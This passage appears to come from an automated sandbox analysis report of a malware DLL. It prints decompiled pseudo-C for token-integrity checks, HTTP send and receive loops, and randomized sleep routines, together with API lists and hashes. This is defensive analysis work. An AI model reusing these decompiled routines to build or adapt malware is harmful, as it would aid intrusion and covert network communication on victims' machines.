				if( *0x428d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04281525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04288B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x0428a2d3
                                0x0428a2da
                                0x0428a2e1
                                0x0428a2f5
                                0x0428a300
                                0x0428a318
                                0x0428a325
                                0x0428a328
                                0x0428a32d
                                0x0428a338
                                0x0428a33c
                                0x0428a34b
                                0x0428a34f
                                0x0428a36b
                                0x0428a36b
                                0x0428a36f
                                0x0428a36f
                                0x0428a374
                                0x0428a378
                                0x0428a37e
                                0x0428a37f
                                0x0428a386
                                0x0428a38c

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0428A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 0428A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0428A328
                                • CloseHandle.KERNEL32(00000000), ref: 0428A378
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 0428A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0428A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0428A363
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: ff2b8ce02f960a8b17e68e0a1bef96ec20e5881dd2a3d4fb76b2600dbc75b3af
                                • Instruction ID: aaf70f21571638f5735a9b71968992dcdf90f7805f3046c580c2b03c1285de6b
                                • Opcode Fuzzy Hash: ff2b8ce02f960a8b17e68e0a1bef96ec20e5881dd2a3d4fb76b2600dbc75b3af
                                • Instruction Fuzzy Hash: A2214F75A1121DFFEB00AFA4EC48EEEBB79FB44304F10006AE510A6191DB759E55EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285988, Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 223 4285988-428598f 224 428599a-428a574 ResetEvent InternetReadFile 223->224 225 4285991-4285998 call 42857dd 223->225 229 428a5a5-428a5aa 224->229 230 428a576-428a584 GetLastError 224->230 225->224 235 42859a2-42859a3 225->235 233 428a66d 229->233 234 428a5b0-428a5bf 229->234 231 428a59d-428a59f 230->231 232 428a586-428a594 call 42829c0 230->232 231->229 237 428a670-428a676 231->237 232->237 240 428a59a 232->240 233->237 241 428a668-428a66b 234->241 242 428a5c5-428a5d4 call 4281525 234->242 240->231 241->237 245 428a65a-428a65c 242->245 246 428a5da-428a5e2 242->246 248 428a65d-428a666 245->248 247 428a5e3-428a608 ResetEvent InternetReadFile 246->247 251 428a60a-428a618 GetLastError 247->251 252 428a631-428a636 247->252 248->237 253 428a61a-428a628 call 42829c0 251->253 254 428a641-428a64b call 4288b22 251->254 252->254 255 428a638-428a63f 252->255 253->254 260 428a62a-428a62f 253->260 254->248 261 428a64d-428a658 call 42848cb 254->261 255->247 260->252 260->254 261->248
                                C-Code - Quality: 71%
                                			E04285988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				int _t34;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
					if(_t34 != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x428d164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04281525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E042829C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04288B22(_v16);
										if(_t64 == 0) {
											_t64 = E042848CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E042829C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E042857DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                0x04285988
                                0x04285989
                                0x0428598f
                                0x0428599a
                                0x0428599a
                                0x0428599c
                                0x0428a556
                                0x0428a55b
                                0x0428a55d
                                0x0428a56c
                                0x0428a574
                                0x0428a5a5
                                0x0428a5aa
                                0x0428a66d
                                0x0428a5b0
                                0x0428a5b7
                                0x0428a5bf
                                0x0428a66a
                                0x0428a5c5
                                0x0428a5ca
                                0x0428a5cf
                                0x0428a5d4
                                0x0428a65c
                                0x0428a5da
                                0x0428a5da
                                0x0428a5dc
                                0x0428a5e2
                                0x0428a5e3
                                0x0428a5e3
                                0x0428a5e6
                                0x0428a5e9
                                0x0428a5ef
                                0x0428a600
                                0x0428a608
                                0x00000000
                                0x00000000
                                0x0428a610
                                0x0428a618
                                0x0428a624
                                0x0428a628
                                0x0428a62a
                                0x0428a62f
                                0x00000000
                                0x00000000
                                0x0428a62f
                                0x0428a628
                                0x0428a641
                                0x0428a644
                                0x0428a64b
                                0x0428a656
                                0x0428a656
                                0x00000000
                                0x0428a631
                                0x0428a631
                                0x0428a636
                                0x0428a638
                                0x0428a639
                                0x0428a63c
                                0x00000000
                                0x0428a63c
                                0x00000000
                                0x0428a636
                                0x0428a5e3
                                0x0428a65d
                                0x0428a65d
                                0x0428a663
                                0x0428a663
                                0x0428a5bf
                                0x0428a576
                                0x0428a57c
                                0x0428a584
                                0x0428a59d
                                0x0428a59f
                                0x00000000
                                0x00000000
                                0x0428a586
                                0x0428a590
                                0x0428a594
                                0x0428a59a
                                0x00000000
                                0x0428a59a
                                0x0428a594
                                0x0428a584
                                0x0428a676
                                0x04285991
                                0x04285991
                                0x04285998
                                0x042859a3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04285998

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 0428A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 0428A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 0428A576
                                • ResetEvent.KERNEL32(?), ref: 0428A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 0428A600
                                • GetLastError.KERNEL32 ref: 0428A60A
                                  • Part of subcall function 042857DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 042857F4
                                  • Part of subcall function 042857DD: SetEvent.KERNEL32(?), ref: 04285804
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04285836
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428585B
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428587B
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: e4fc1574084abe74399a433c441c59083685aa285e133c9b2e7cdf827d1d8477
                                • Instruction ID: ef5e85bb35cb2680fd19b20e5b9268a56af0f4022311f69ab2ed69bdb396239b
                                • Opcode Fuzzy Hash: e4fc1574084abe74399a433c441c59083685aa285e133c9b2e7cdf827d1d8477
                                • Instruction Fuzzy Hash: A941D232B22611EBDF21BEA9DC44A6E73B9AF843A0F10056EE512D71D0EB70F9418B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04282789, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04282789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x428d238 = _t10;
				if(_t10 != 0) {
					 *0x428d1a8 = GetTickCount();
					_t12 = E04289EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L0428B0CA();
							_t34 = _t14 + _t16;
							_t18 = E0428122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E04284D4D(_t26) != 0) {
							 *0x428d260 = 1; // executed
						}
						_t12 = E04282F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                0x04282789
                                0x0428278f
                                0x04282790
                                0x0428279c
                                0x042827a2
                                0x042827a9
                                0x042827b9
                                0x042827be
                                0x042827c5
                                0x042827c7
                                0x042827cc
                                0x042827d2
                                0x042827d8
                                0x042827e2
                                0x042827e6
                                0x042827e8
                                0x042827ed
                                0x042827ee
                                0x042827ef
                                0x042827f4
                                0x042827fa
                                0x04282805
                                0x04282806
                                0x0428280c
                                0x04282812
                                0x0428281e
                                0x04282820
                                0x04282820
                                0x0428282a
                                0x0428282a
                                0x042827ab
                                0x042827ad
                                0x042827ad
                                0x04282834

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428279C
                                • GetTickCount.KERNEL32 ref: 042827B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04287F25,?), ref: 042827CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 042827D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 042827EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428280C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: cde83a7ebe1a3f2578f25797fcd8965eecf8a6c1a38e0d4d35f357b4a7f9c2ae
                                • Instruction ID: cbbfe2e425e049d3e6f50f68b90d770ddb068217aeb39cfadc2a61fc4ce02abb
                                • Opcode Fuzzy Hash: cde83a7ebe1a3f2578f25797fcd8965eecf8a6c1a38e0d4d35f357b4a7f9c2ae
                                • Instruction Fuzzy Hash: 9711A072B66205ABE7147BA9FC1DB6E76A8DB44394F00412DF905D72C4EBB4EC408671
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 042897F7, Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 279 42897f7-4289806 280 4289808-4289818 call 4288cfa 279->280 281 428981a-4289825 call 428a85c 279->281 280->281 286 4289869 GetLastError 280->286 287 4289864-4289867 281->287 288 4289827-428984c ResetEvent * 2 HttpSendRequestA 281->288 291 428986b-428986d 286->291 287->286 287->291 289 4289859-428985c SetEvent 288->289 290 428984e-4289855 GetLastError 288->290 293 4289862 289->293 290->287 292 4289857 290->292 292->293 293->287
                                C-Code - Quality: 100%
                                			E042897F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				int _t14;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04288CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0428A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_t14 = HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0); // executed
					if(_t14 != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}








                                0x042897f7
                                0x04289804
                                0x04289806
                                0x04289869
                                0x00000000
                                0x04289869
                                0x0428981e
                                0x04289825
                                0x04289831
                                0x04289836
                                0x04289843
                                0x0428984c
                                0x0428985c
                                0x00000000
                                0x0428984e
                                0x0428984e
                                0x04289855
                                0x04289862
                                0x04289862
                                0x04289862
                                0x04289855
                                0x0428984c
                                0x04289867
                                0x00000000
                                0x00000000
                                0x0428986d

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,0428937B,?,?,00000000,00000000), ref: 04289831
                                • ResetEvent.KERNEL32(?), ref: 04289836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04289843
                                • GetLastError.KERNEL32 ref: 0428984E
                                • GetLastError.KERNEL32(?,?,00000102,0428937B,?,?,00000000,00000000), ref: 04289869
                                  • Part of subcall function 04288CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000), ref: 04288D06
                                  • Part of subcall function 04288CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102,0428937B,?), ref: 04288D64
                                  • Part of subcall function 04288CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 04288D74
                                • SetEvent.KERNEL32(?), ref: 0428985C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: e844a6437fda9e25d29e340f8f4a0acd2052810cb11a940192684c870818e405
                                • Instruction ID: f538f3c1cf78ce237902e7bacbd95b566e6682f14139b682117fcc0c73531962
                                • Opcode Fuzzy Hash: e844a6437fda9e25d29e340f8f4a0acd2052810cb11a940192684c870818e405
                                • Instruction Fuzzy Hash: 33018F71322206AAD7317B36EC48F2FB6A8EF44364F10062DE551950E0D721E844DE60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04281128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 4281128-4281137 RtlEnterCriticalSection 295 4281141-428114b 294->295 296 4281139-428113b Sleep 295->296 297 428114d-4281151 295->297 296->295 298 4281169-428116e call 4284a2a 297->298 299 4281153-4281158 297->299 302 4281173-4281185 RtlLeaveCriticalSection 298->302 299->298 300 428115a-428115d 299->300 300->298
                                C-Code - Quality: 50%
                                			E04281128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x428d32c; // 0x4d795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x428d32c; // 0x4d795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x428d030) {
					HeapFree( *0x428d238, 0, _t8);
				}
				_t9 = E04284A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x428d32c; // 0x4d795b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                0x04281128
                                0x04281128
                                0x04281131
                                0x04281141
                                0x04281141
                                0x04281146
                                0x0428114b
                                0x00000000
                                0x00000000
                                0x0428113b
                                0x0428113b
                                0x0428114d
                                0x04281151
                                0x04281163
                                0x04281163
                                0x0428116e
                                0x04281173
                                0x04281176
                                0x0428117b
                                0x0428117f
                                0x04281185

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04281131
                                • Sleep.KERNEL32(0000000A,?,042830F3), ref: 0428113B
                                • HeapFree.KERNEL32(00000000,00000000,?,042830F3), ref: 04281163
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 0428117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 467ce1b87a875f62e84e15244b99da3ab8a63e441512d3fe0e979e240c43afb5
                                • Instruction ID: e31e3f12b9619fb7b499b5f0be6a08342f4999f670f5aa3db185980545fd0bd1
                                • Opcode Fuzzy Hash: 467ce1b87a875f62e84e15244b99da3ab8a63e441512d3fe0e979e240c43afb5
                                • Instruction Fuzzy Hash: C4F0B7707262419BE714AF69F84CB2EBBA8EB04781B04840DF501DA2E2D728EC55DA25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04282F70, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 303 4282f70-4282f8b call 42859a4 306 4282f8d-4282f9b 303->306 307 4282fa1-4282faf 303->307 306->307 309 4282fc1-4282fdc call 4282b6f 307->309 310 4282fb1-4282fb4 307->310 316 4282fde-4282fe4 309->316 317 4282fe6 309->317 310->309 311 4282fb6-4282fbb 310->311 311->309 313 4283142 311->313 315 4283144-428314a 313->315 318 4282fec-4283001 call 4289154 call 4288e0d 316->318 317->318 323 428300c-4283011 318->323 324 4283003-4283006 CloseHandle 318->324 325 4283013-4283018 323->325 326 4283037-428304f call 4281525 323->326 324->323 327 428312e-4283132 325->327 328 428301e 325->328 334 428307b-428307d 326->334 335 4283051-4283079 memset RtlInitializeCriticalSection 326->335 331 428313a-4283140 327->331 332 4283134-4283138 327->332 333 4283021-4283030 call 4288b7b 328->333 331->315 332->315 332->331 341 4283032 333->341 337 428307e-4283082 334->337 335->337 337->327 340 4283088-428309e RtlAllocateHeap 337->340 342 42830ce-42830d0 340->342 343 42830a0-42830cc wsprintfA 340->343 341->327 344 42830d1-42830d5 342->344 343->344 344->327 345 42830d7-42830f7 call 4287a2e call 4287fbe 344->345 345->327 350 42830f9-4283100 call 42850e8 345->350 353 4283102-4283105 350->353 354 4283107-428310e 350->354 353->327 355 4283110-4283112 354->355 356 4283123-4283127 call 4287c3d 354->356 355->327 357 4283114-4283121 call 42846b2 355->357 360 428312c 356->360 357->327 357->356 360->327
                                C-Code - Quality: 57%
                                			E04282F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E042859A4();
				if(_t21 != 0) {
					_t59 =  *0x428d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x428d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x428d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04282B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x428d2a8; // 0xaea5a8
					if( *0x428d25c > 5) {
						_t8 = _t26 + 0x428e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x428e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04289154(_t27, _t27);
					_t31 = E04288E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x428d270 =  *0x428d270 ^ 0x81bbe65d;
						_t32 = E04281525(0x60);
						 *0x428d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x428d32c; // 0x4d795b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x428d32c; // 0x4d795b0
							 *_t51 = 0x428e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x428d238, 0, 0x43);
							 *0x428d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x428d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x428d2a8; // 0xaea5a8
								_t13 = _t58 + 0x428e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x428c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04287A2E( ~_v8 &  *0x428d270,  &E0428D00C); // executed
								_t42 = E04287FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E042850E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04287C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E042846B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x428d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04288B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                0x04282f70
                                0x04282f7b
                                0x04282f7e
                                0x04282f81
                                0x04282f84
                                0x04282f8b
                                0x04282f8d
                                0x04282f99
                                0x04282f9b
                                0x04282f9b
                                0x04282fa4
                                0x04282faa
                                0x04282faf
                                0x04282fc9
                                0x04282fd5
                                0x04282fd7
                                0x04282fdc
                                0x04282fe6
                                0x04282fe6
                                0x04282fde
                                0x04282fde
                                0x04282fde
                                0x04282fde
                                0x04282fed
                                0x04282ffa
                                0x04283001
                                0x04283006
                                0x04283006
                                0x0428300e
                                0x04283011
                                0x04283037
                                0x04283043
                                0x04283048
                                0x0428304d
                                0x0428304f
                                0x0428307b
                                0x0428307d
                                0x04283051
                                0x04283055
                                0x0428305a
                                0x0428305f
                                0x04283066
                                0x0428306c
                                0x04283071
                                0x04283077
                                0x0428307e
                                0x04283080
                                0x04283082
                                0x04283091
                                0x04283097
                                0x0428309c
                                0x0428309e
                                0x042830ce
                                0x042830d0
                                0x042830a0
                                0x042830a0
                                0x042830a6
                                0x042830b3
                                0x042830b9
                                0x042830b9
                                0x042830c1
                                0x042830ca
                                0x042830d1
                                0x042830d3
                                0x042830d5
                                0x042830dc
                                0x042830e9
                                0x042830ee
                                0x042830f3
                                0x042830f5
                                0x042830f7
                                0x00000000
                                0x00000000
                                0x042830f9
                                0x042830fe
                                0x04283100
                                0x04283107
                                0x0428310b
                                0x0428310e
                                0x04283123
                                0x04283127
                                0x0428312c
                                0x00000000
                                0x0428312c
                                0x04283110
                                0x04283112
                                0x00000000
                                0x00000000
                                0x0428311d
                                0x0428311f
                                0x04283121
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04283121
                                0x04283104
                                0x04283104
                                0x042830d5
                                0x04283013
                                0x04283013
                                0x04283018
                                0x0428312e
                                0x04283132
                                0x0428313a
                                0x0428313a
                                0x00000000
                                0x04283132
                                0x0428301e
                                0x04283021
                                0x0428302b
                                0x04283032
                                0x00000000
                                0x04283142
                                0x04283142
                                0x04283146
                                0x0428314a
                                0x0428314a

                                APIs
                                  • Part of subcall function 042859A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,04282F89,00000000,00000000), ref: 042859B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04283006
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • memset.NTDLL ref: 04283055
                                • RtlInitializeCriticalSection.NTDLL(04D79570), ref: 04283066
                                  • Part of subcall function 042846B2: memset.NTDLL ref: 042846C7
